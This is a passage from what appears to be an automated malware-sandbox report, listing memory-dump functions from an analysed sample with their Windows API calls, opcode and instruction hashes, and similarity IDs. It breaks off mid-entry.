                                                            • Opcode Fuzzy Hash: be0960591c62f7aa94cde180f88e9dfc27c0d8d211e305885a2408f5d512123c
                                                            • Instruction Fuzzy Hash: 754124719043458FCB10DF69D8547EEBFB0FF8A314F0480AAD059AB653C7389849CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1D9E67ED, Relevance: 1.6, APIs: 1, Instructions: 122COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1D9E690A
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5657217630.000000001D9E0000.00000040.00000001.sdmp, Offset: 1D9E0000, based on PE: false
                                                            Similarity
                                                            • API ID: CreateWindow
                                                            • String ID:
                                                            • API String ID: 716092398-0
                                                            • Opcode ID: d3231e59faf3fafc60bcfc8f72aeb7f090c66fc157cf70daacb03d1007017c31
                                                            • Instruction ID: 80ec2ce8a2688607e2afc62a843c213c16eda1131ec45fa7a892bdd8fff3c2ee
                                                            • Opcode Fuzzy Hash: d3231e59faf3fafc60bcfc8f72aeb7f090c66fc157cf70daacb03d1007017c31
                                                            • Instruction Fuzzy Hash: E951C1B1D00309DFDB15CF99C884ADEBBB5BF88350F20862EE819AB211D774A945CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00F1825F, Relevance: 1.6, APIs: 1, Instructions: 119registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 00F18374
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5639780424.0000000000F10000.00000040.00000010.sdmp, Offset: 00F10000, based on PE: false
                                                            Similarity
                                                            • API ID: Open
                                                            • String ID:
                                                            • API String ID: 71445658-0
                                                            • Opcode ID: d4ca6323b72b8ce09ef332f2255379f2ae3330279c9abe458a8a332413b33e0b
                                                            • Instruction ID: 219e85310de17559d64a6f677078631a9074b3a258f31b5d1db5b24ce88ea6cc
                                                            • Opcode Fuzzy Hash: d4ca6323b72b8ce09ef332f2255379f2ae3330279c9abe458a8a332413b33e0b
                                                            • Instruction Fuzzy Hash: F9417B70D053898FCB01CFA9C544BDEFFF0AF49314F28856AD419AB292CB749886CB61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A45CE8, Relevance: 1.6, APIs: 1, Instructions: 117fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DeleteFileW.KERNEL32(00000000), ref: 00A45DB8
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5634997276.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                            Similarity
                                                            • API ID: DeleteFile
                                                            • String ID:
                                                            • API String ID: 4033686569-0
                                                            • Opcode ID: 0096f0b16f18dedda2d73eddad0f26f50a901c6f33a2c12160ea21a8ec29f9fb
                                                            • Instruction ID: 3a718399d280139295095edd5eb066bbe1a68dd6f452b8c14c2f590c30b560e7
                                                            • Opcode Fuzzy Hash: 0096f0b16f18dedda2d73eddad0f26f50a901c6f33a2c12160ea21a8ec29f9fb
                                                            • Instruction Fuzzy Hash: E541BA75E007598FCB40DFA9C5087AEBBF0EF89310F10856AD908E7382E7349905CBA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00B0C18D, Relevance: 1.6, APIs: 1, Instructions: 114threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • TerminateThread.KERNEL32(-000000010490A5DD,-1946A35B), ref: 00B0C235
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5636243835.0000000000B0C000.00000040.00000001.sdmp, Offset: 00B0C000, based on PE: false
                                                            Similarity
                                                            • API ID: TerminateThread
                                                            • String ID:
                                                            • API String ID: 1852365436-0
                                                            • Opcode ID: 963e3a53068518146c1a9a05ec052f535dee233ddfc3315328e3c7d6338043d9
                                                            • Instruction ID: 97efa137014e28f21f423abece7b393a21500a2e1e88221e230049eea92259ec
                                                            • Opcode Fuzzy Hash: 963e3a53068518146c1a9a05ec052f535dee233ddfc3315328e3c7d6338043d9
                                                            • Instruction Fuzzy Hash: 9A318CB17047024FDB288A68C8E57E73BE39F56350F4882BEDC49CF692DB3188828305
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1D9E67F8, Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1D9E690A
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5657217630.000000001D9E0000.00000040.00000001.sdmp, Offset: 1D9E0000, based on PE: false
                                                            Similarity
                                                            • API ID: CreateWindow
                                                            • String ID:
                                                            • API String ID: 716092398-0
                                                            • Opcode ID: 19e35966c1753325375eb0b214f3adb1e05207220aef2e7324283b2cabc3d9f6
                                                            • Instruction ID: 245ab4b9f674ad5d0b95384bc731f2743b8e66412e25c4579193f315ef42a820
                                                            • Opcode Fuzzy Hash: 19e35966c1753325375eb0b214f3adb1e05207220aef2e7324283b2cabc3d9f6
                                                            • Instruction Fuzzy Hash: 1D41AFB1D00309DFDB15CF9AC884ADEBFB5BF88350F20852AE819AB250D775A945CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1D9EA144, Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 1D9EB4E1
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5657217630.000000001D9E0000.00000040.00000001.sdmp, Offset: 1D9E0000, based on PE: false
                                                            Similarity
                                                            • API ID: CallProcWindow
                                                            • String ID:
                                                            • API String ID: 2714655100-0
                                                            • Opcode ID: aaa685401a2e866ed0852be4d66f2ac4f1b720c9b0b87df8d7a1f0489538fe9c
                                                            • Instruction ID: 62fe6bbf2fa5f938ac38895ba2b64b3be31a0b44d003150c4e38b5ec2089ba32
                                                            • Opcode Fuzzy Hash: aaa685401a2e866ed0852be4d66f2ac4f1b720c9b0b87df8d7a1f0489538fe9c
                                                            • Instruction Fuzzy Hash: DC4126B4900309CFCB12CF95C484AAEBBF9FF89318F24C959D519AB321D775A841CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1D9EA610, Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5657217630.000000001D9E0000.00000040.00000001.sdmp, Offset: 1D9E0000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 81875d8b5c7969eb7c2f1188f317e76a5ffbae698c8bb57c01543fcf0448dc5b
                                                            • Instruction ID: a114bd5f07bfe7f8d748d771417e6d6ba9f9f9b7e6eb35b04f762e1119914951
                                                            • Opcode Fuzzy Hash: 81875d8b5c7969eb7c2f1188f317e76a5ffbae698c8bb57c01543fcf0448dc5b
                                                            • Instruction Fuzzy Hash: 6B417C786403A08FE3018FA0D5E577E7BB1FB99721F18806AE9018B7D6CF794961CB52
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00F10D58, Relevance: 1.6, APIs: 1, Instructions: 88registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 00F185E1
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5639780424.0000000000F10000.00000040.00000010.sdmp, Offset: 00F10000, based on PE: false
                                                            Similarity
                                                            • API ID: QueryValue
                                                            • String ID:
                                                            • API String ID: 3660427363-0
                                                            • Opcode ID: cdbc6658158a171af3867f5b761cf65dfe77c78520f68d4ad55d38f904cfe7b6
                                                            • Instruction ID: 20aa65e0cb7c6e9908c3ba12547a89c5f5d57fc7506d0c243a576888f10b97cc
                                                            • Opcode Fuzzy Hash: cdbc6658158a171af3867f5b761cf65dfe77c78520f68d4ad55d38f904cfe7b6
                                                            • Instruction Fuzzy Hash: 9231DEB1D002589FCB20CF9AC984ADEBBF5BF48350F14806AE819AB350DB709945DFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00B0C19A, Relevance: 1.6, APIs: 1, Instructions: 87threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • TerminateThread.KERNEL32(-000000010490A5DD,-1946A35B), ref: 00B0C235
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5636243835.0000000000B0C000.00000040.00000001.sdmp, Offset: 00B0C000, based on PE: false
                                                            Similarity
                                                            • API ID: TerminateThread
                                                            • String ID:
                                                            • API String ID: 1852365436-0
                                                            • Opcode ID: b29df1c305d99385c7b35930f802dc1506f07538fd5bd67c7afd29a413af80d5
                                                            • Instruction ID: 885904a3dbeab35bef6b08a763a9c45eb25fbfcc4b254e4978bb0e3d78bd5b9e
                                                            • Opcode Fuzzy Hash: b29df1c305d99385c7b35930f802dc1506f07538fd5bd67c7afd29a413af80d5
                                                            • Instruction Fuzzy Hash: 343127707047169FDB288F68C8E47EA3BE7AF86350F4842AEDC498B692D73148818705
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00F18523, Relevance: 1.6, APIs: 1, Instructions: 87registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 00F185E1
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5639780424.0000000000F10000.00000040.00000010.sdmp, Offset: 00F10000, based on PE: false
                                                            Similarity
                                                            • API ID: QueryValue
                                                            • String ID:
                                                            • API String ID: 3660427363-0
                                                            • Opcode ID: cec094397cbc256616a0f923c7c99eddf0d8346a615b5b29c94c952b7fc2e503
                                                            • Instruction ID: 01119eff7b348ea16021aa8941059b92106bcb94b9149f9156b54006719e2b2c
                                                            • Opcode Fuzzy Hash: cec094397cbc256616a0f923c7c99eddf0d8346a615b5b29c94c952b7fc2e503
                                                            • Instruction Fuzzy Hash: 4C31D2B1D002589FCB20CF99C984ADEFBF5BF48354F14856AE819AB350DB709946CFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00F10D4C, Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 00F18374
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5639780424.0000000000F10000.00000040.00000010.sdmp, Offset: 00F10000, based on PE: false
                                                            Similarity
                                                            • API ID: Open
                                                            • String ID:
                                                            • API String ID: 71445658-0
                                                            • Opcode ID: 9526e6be07c76d588d8fbf4e8df5a0753eae65c3444304d199ec9de994559ff6
                                                            • Instruction ID: 892d34e99869095b916063662f6b5754830681b55a812bacf6c2234ff5d72306
                                                            • Opcode Fuzzy Hash: 9526e6be07c76d588d8fbf4e8df5a0753eae65c3444304d199ec9de994559ff6
                                                            • Instruction Fuzzy Hash: 54311FB0C002489FDB00CF99C284ACEFFF4AF49304F28816AE808AB341C7759985CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1D9EA54A, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1D9EA5D7
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5657217630.000000001D9E0000.00000040.00000001.sdmp, Offset: 1D9E0000, based on PE: false
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: b80e85cdfa3b3bc8bf0b2e1224938fe9aab054092422c1ce4badbe0c1515fe4e
                                                            • Instruction ID: 603bfe0720c195af46d47f0b888f92b9a191f35cf0ea819bfd0fe96e520cb906
                                                            • Opcode Fuzzy Hash: b80e85cdfa3b3bc8bf0b2e1224938fe9aab054092422c1ce4badbe0c1515fe4e
                                                            • Instruction Fuzzy Hash: D12105B5900208DFDB00CFAAD484ADEFBF8EF48310F10841AE955A7311C374A944CFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1D9EA550, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1D9EA5D7
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5657217630.000000001D9E0000.00000040.00000001.sdmp, Offset: 1D9E0000, based on PE: false
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: cab20745431c512756ed8d7fe2a158430de71777747c7a8c3dd3edd7cf3ff402
                                                            • Instruction ID: 700f5a45191834dda4a2cf0eaef25f8c70f756c7669782b1a5b3ad5e50ea68b9
                                                            • Opcode Fuzzy Hash: cab20745431c512756ed8d7fe2a158430de71777747c7a8c3dd3edd7cf3ff402
                                                            • Instruction Fuzzy Hash: 6B21E4B5900248DFDB10CFAAD984AEEFBF8EF49310F10841AE955A7351C378A944CFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A44898, Relevance: 1.6, APIs: 1, Instructions: 59fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DeleteFileW.KERNEL32(00000000), ref: 00A45DB8
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5634997276.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                            Similarity
                                                            • API ID: DeleteFile
                                                            • String ID:
                                                            • API String ID: 4033686569-0
                                                            • Opcode ID: 24d182dd203035f77860984148f197dc8663a523b2f58d386b71c8dbbfb304e1
                                                            • Instruction ID: df93b98c9aa1ba57f4dafcad7edbdd3d03ca407bb89930990a267411b094c01d
                                                            • Opcode Fuzzy Hash: 24d182dd203035f77860984148f197dc8663a523b2f58d386b71c8dbbfb304e1
                                                            • Instruction Fuzzy Hash: F52124B5C00A199FCB10CFAAC5487EEFBB4EF49324F10856AD818A7741D778A945CFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00F1FA88, Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindWindowW.USER32(00000000,00000000), ref: 00F1FB06
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5639780424.0000000000F10000.00000040.00000010.sdmp, Offset: 00F10000, based on PE: false
                                                            Similarity
                                                            • API ID: FindWindow
                                                            • String ID:
                                                            • API String ID: 134000473-0
                                                            • Opcode ID: 09c285cec4e26ad601e9bf8eb34c874f90b65d0053e1523c08c42f6849092844
                                                            • Instruction ID: 9d1935d50d100972ef5451678532c52de4caab6fecaef52d7aafaea9a91179cf
                                                            • Opcode Fuzzy Hash: 09c285cec4e26ad601e9bf8eb34c874f90b65d0053e1523c08c42f6849092844
                                                            • Instruction Fuzzy Hash: C62110B5C002098FCB10CF9AD484ADEFBF4FF89324F14852ED859A7610C378A949CBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DA4A16, Relevance: 1.6, APIs: 1, Instructions: 58libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5637894406.0000000000DA0000.00000040.00000010.sdmp, Offset: 00DA0000, based on PE: false
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: c042d941e5cbd21e329b403f2dd0c039b3e972cec75e01640a748d6bd3065db0
                                                            • Instruction ID: e514c9f901a2701b1f9446941cb4b4af375696070b8bcab48c3157c97a37eb80
                                                            • Opcode Fuzzy Hash: c042d941e5cbd21e329b403f2dd0c039b3e972cec75e01640a748d6bd3065db0
                                                            • Instruction Fuzzy Hash: 68215974E06218EFCB04DFB4C884AADBBB1FB85355F218828D405AB251CB76A885CB95
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00F1D78C, Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindWindowW.USER32(00000000,00000000), ref: 00F1FB06
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5639780424.0000000000F10000.00000040.00000010.sdmp, Offset: 00F10000, based on PE: false
                                                            Similarity
                                                            • API ID: FindWindow
                                                            • String ID:
                                                            • API String ID: 134000473-0
                                                            • Opcode ID: 99e60f3135abe63b2b138603ee40601c600ad48a0dfdf211337f1add9d5be521
                                                            • Instruction ID: 1359215bfbc81cfc5d54646f20884d658fadaedcb401f9c8a62b496635ac8f87
                                                            • Opcode Fuzzy Hash: 99e60f3135abe63b2b138603ee40601c600ad48a0dfdf211337f1add9d5be521
                                                            • Instruction Fuzzy Hash: E32102B5D002098FCB10CF9AD484AEEFBB4FF89324F10852ED459A7611C378A948CBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00D229B1, Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,?,00D22991,00000800), ref: 00D22A22
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5636755084.0000000000D20000.00000040.00000010.sdmp, Offset: 00D20000, based on PE: false
                                                            Similarity
                                                            • API ID: LibraryLoad
                                                            • String ID:
                                                            • API String ID: 1029625771-0
                                                            • Opcode ID: 9cc3b5a02f713aca069b641a1150bded41c8a672156ca28a23cfdad8f9efa478
                                                            • Instruction ID: 45a375650e8646039f5a82bb2b83890a474a1b922df9ed5912ee61c1c2e34d2b
                                                            • Opcode Fuzzy Hash: 9cc3b5a02f713aca069b641a1150bded41c8a672156ca28a23cfdad8f9efa478
                                                            • Instruction Fuzzy Hash: 681136B68003489FCB20CFAAD444AEEFBF4AF99314F14846ED855A7710C374A505CFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00F1A280, Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,00F1A202), ref: 00F1A2EF
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5639780424.0000000000F10000.00000040.00000010.sdmp, Offset: 00F10000, based on PE: false
                                                            Similarity
                                                            • API ID: GlobalMemoryStatus
                                                            • String ID:
                                                            • API String ID: 1890195054-0
                                                            • Opcode ID: 851c488b844e7f840ec8aa2f7eccdb770316f38f46006ecef59e4734647cfde1
                                                            • Instruction ID: a01fd6579c4737612c035339e42536325d551279211a141dcbf4e4540f0d20d2
                                                            • Opcode Fuzzy Hash: 851c488b844e7f840ec8aa2f7eccdb770316f38f46006ecef59e4734647cfde1
                                                            • Instruction Fuzzy Hash: 621153B1C002599FCB00CFAAC4487EEFBB4EF49320F11856AD818B7241D378A945CFA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00D216EC, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,?,00D22991,00000800), ref: 00D22A22
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5636755084.0000000000D20000.00000040.00000010.sdmp, Offset: 00D20000, based on PE: false
                                                            Similarity
                                                            • API ID: LibraryLoad
                                                            • String ID:
                                                            • API String ID: 1029625771-0
                                                            • Opcode ID: 41f621ef8c2e4c58fbafc837c111e3d5a0ef80ec9ed276d1a572d11ce6c4dcad
                                                            • Instruction ID: 4d859f0f6aa610e861b88fe20dedbfc888d4ab395d4f25bcee9450b5ef08e633
                                                            • Opcode Fuzzy Hash: 41f621ef8c2e4c58fbafc837c111e3d5a0ef80ec9ed276d1a572d11ce6c4dcad
                                                            • Instruction Fuzzy Hash: 1B1114B6D003589FCB20CF9AD444BEEFBF4AB98314F14842AE955A7710C374A945CFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00F10F44, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,00F1A202), ref: 00F1A2EF
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5639780424.0000000000F10000.00000040.00000010.sdmp, Offset: 00F10000, based on PE: false
                                                            Similarity
                                                            • API ID: GlobalMemoryStatus
                                                            • String ID:
                                                            • API String ID: 1890195054-0
                                                            • Opcode ID: 3bad3503c0a2c60a4bfd575da847ceac66421a3d468f6c06b4665c18ec3e7012
                                                            • Instruction ID: a839af34ba5944725319875bfd7af341bb3108ef00bd178fac822594332c32fc
                                                            • Opcode Fuzzy Hash: 3bad3503c0a2c60a4bfd575da847ceac66421a3d468f6c06b4665c18ec3e7012
                                                            • Instruction Fuzzy Hash: ED1122B1C006599BCB10CFAAC5447EEFBB4AF49324F10856AE814B7241D778A9558BA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1D9E5749, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 1D9E57B6
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5657217630.000000001D9E0000.00000040.00000001.sdmp, Offset: 1D9E0000, based on PE: false
                                                            Similarity
                                                            • API ID: HandleModule
                                                            • String ID:
                                                            • API String ID: 4139908857-0
                                                            • Opcode ID: f6c4eff93af4114762270364876e42166db3122ca5bfc668a49b6b9b85066f90
                                                            • Instruction ID: a049986c8ea47983fe8904a2f46719609920a5114a46a9529d063a538a334bc5
                                                            • Opcode Fuzzy Hash: f6c4eff93af4114762270364876e42166db3122ca5bfc668a49b6b9b85066f90
                                                            • Instruction Fuzzy Hash: 7C111FB58002098ECB11CF9AC444ADEFBF8AB89320F10841AD829A7611D379A545CFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1D9E37C8, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 1D9E57B6
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5657217630.000000001D9E0000.00000040.00000001.sdmp, Offset: 1D9E0000, based on PE: false
                                                            Similarity
                                                            • API ID: HandleModule
                                                            • String ID:
                                                            • API String ID: 4139908857-0
                                                            • Opcode ID: 70da3bec9981a0c52c6a75f88e8d7f97d3642b5169b67280ea2eb620d589d5e1
                                                            • Instruction ID: 95c3f8185cd0af2821ffebb917618e30e758dc9c2c6a2ade96e23914c81c0509
                                                            • Opcode Fuzzy Hash: 70da3bec9981a0c52c6a75f88e8d7f97d3642b5169b67280ea2eb620d589d5e1
                                                            • Instruction Fuzzy Hash: 90111FB5800209CFDB11CF9AC444AAEFBF8AB89220F10842AD969B7710D375A505CFA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00D268E8, Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • OleInitialize.OLE32(00000000), ref: 00D26945
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5636755084.0000000000D20000.00000040.00000010.sdmp, Offset: 00D20000, based on PE: false
                                                            Similarity
                                                            • API ID: Initialize
                                                            • String ID:
                                                            • API String ID: 2538663250-0
                                                            • Opcode ID: d4561424c776f8b90394dcbf93dca909e1a10635ad468ecbf37243f688d753c9
                                                            • Instruction ID: faacf57c4858d0511e2de4587f9daa23cea9b386c516ac9dbe155d831b925a47
                                                            • Opcode Fuzzy Hash: d4561424c776f8b90394dcbf93dca909e1a10635ad468ecbf37243f688d753c9
                                                            • Instruction Fuzzy Hash: BF1125B5800348CFCB10CF9AD448BDEBFF4AB49324F10885AD558A7711D374A944CFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00D25A88, Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • OleInitialize.OLE32(00000000), ref: 00D26945
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5636755084.0000000000D20000.00000040.00000010.sdmp, Offset: 00D20000, based on PE: false
                                                            Similarity
                                                            • API ID: Initialize
                                                            • String ID:
                                                            • API String ID: 2538663250-0
                                                            • Opcode ID: 39f424e06f173456893888ff4356ed03992d66bc00624313c92d856ace6739c5
                                                            • Instruction ID: 426954ce6c8258f8033e56d84944d1f111d3615b064524d7e5ab280a637a26c9
                                                            • Opcode Fuzzy Hash: 39f424e06f173456893888ff4356ed03992d66bc00624313c92d856ace6739c5
                                                            • Instruction Fuzzy Hash: 881122B18003498FCB10CF9AD448B9EFBF8AB48324F208859D958A7710C774A944CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00F184D9, Relevance: 1.5, APIs: 1, Instructions: 37registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 00F185E1
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5639780424.0000000000F10000.00000040.00000010.sdmp, Offset: 00F10000, based on PE: false
                                                            Similarity
                                                            • API ID: QueryValue
                                                            • String ID:
                                                            • API String ID: 3660427363-0
                                                            • Opcode ID: b82447f7492db928c2cd5624e032e11472c12cf8fa037e904af2b2ebc7a00b8b
                                                            • Instruction ID: c8b23127d53a794de0fe2155555e64b10eee4632dfda5b2201b8f5b7b38012a0
                                                            • Opcode Fuzzy Hash: b82447f7492db928c2cd5624e032e11472c12cf8fa037e904af2b2ebc7a00b8b
                                                            • Instruction Fuzzy Hash: E4018471C04259DBDB10CF94C954BEDBFB5AF04358F184449E805AB281CF748C86EB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DB9DD0, Relevance: .6, Instructions: 643COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5638258904.0000000000DB0000.00000040.00000010.sdmp, Offset: 00DB0000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c24e1ed18c7052c2dc774c721c31b41cf1aba29b1c6858ab89e86dea457d1d11
                                                            • Instruction ID: c094923405286b64111761894cf84abfc2a37e2c77ba65157ff1449254c6b730
                                                            • Opcode Fuzzy Hash: c24e1ed18c7052c2dc774c721c31b41cf1aba29b1c6858ab89e86dea457d1d11
                                                            • Instruction Fuzzy Hash: 2932D234B04214CFCB14DBB8C454AADB7F2AF89314B558569E506DB3A6DF31EC06CB61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DB7858, Relevance: .6, Instructions: 558COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5638258904.0000000000DB0000.00000040.00000010.sdmp, Offset: 00DB0000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7ac35f0925032180d544661b12551378419ab191b832f71eb739674dc5a120de
                                                            • Instruction ID: e848de993eda287ca43f97ffd9ab6079459f24081951230d05797a390df472a4
                                                            • Opcode Fuzzy Hash: 7ac35f0925032180d544661b12551378419ab191b832f71eb739674dc5a120de
                                                            • Instruction Fuzzy Hash: 35322934A04218CFDB64DB68C484BADB7B2EF89315F5885A9E40ADB361DB35DC81CF61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DB706F, Relevance: .5, Instructions: 465COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5638258904.0000000000DB0000.00000040.00000010.sdmp, Offset: 00DB0000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c7f940ced738934dffda814dd74df8558999b95bb591c375912fa58d808be778
                                                            • Instruction ID: 0aa51d6e5ddd9b7b4900e3ddfc6169c1148552da309078df8c84c94875f4bd1a
                                                            • Opcode Fuzzy Hash: c7f940ced738934dffda814dd74df8558999b95bb591c375912fa58d808be778
                                                            • Instruction Fuzzy Hash: 31F1903470E3C58FD7028778D865AAA7FB19B86344B1984F7D585CB2A3D628DC0AC772
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DB51E8, Relevance: .4, Instructions: 447COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5638258904.0000000000DB0000.00000040.00000010.sdmp, Offset: 00DB0000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 225959edbd17cf062f1b1b9eacd0b39b357088558c5f0fc29a007fffaa0236a5
                                                            • Instruction ID: 9c95a9cdd94c5e7c5c77cbd1b97629992371720cba84c2bca9b2f0e0eb5b4d3e
                                                            • Opcode Fuzzy Hash: 225959edbd17cf062f1b1b9eacd0b39b357088558c5f0fc29a007fffaa0236a5
                                                            • Instruction Fuzzy Hash: 5FF1E434B04606DFCB10CBB8E8847ADB7B2AF85354F248929D506DB399DB30EC01CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DB4E50, Relevance: .4, Instructions: 392COMMON
                                                            Download Yara Rule
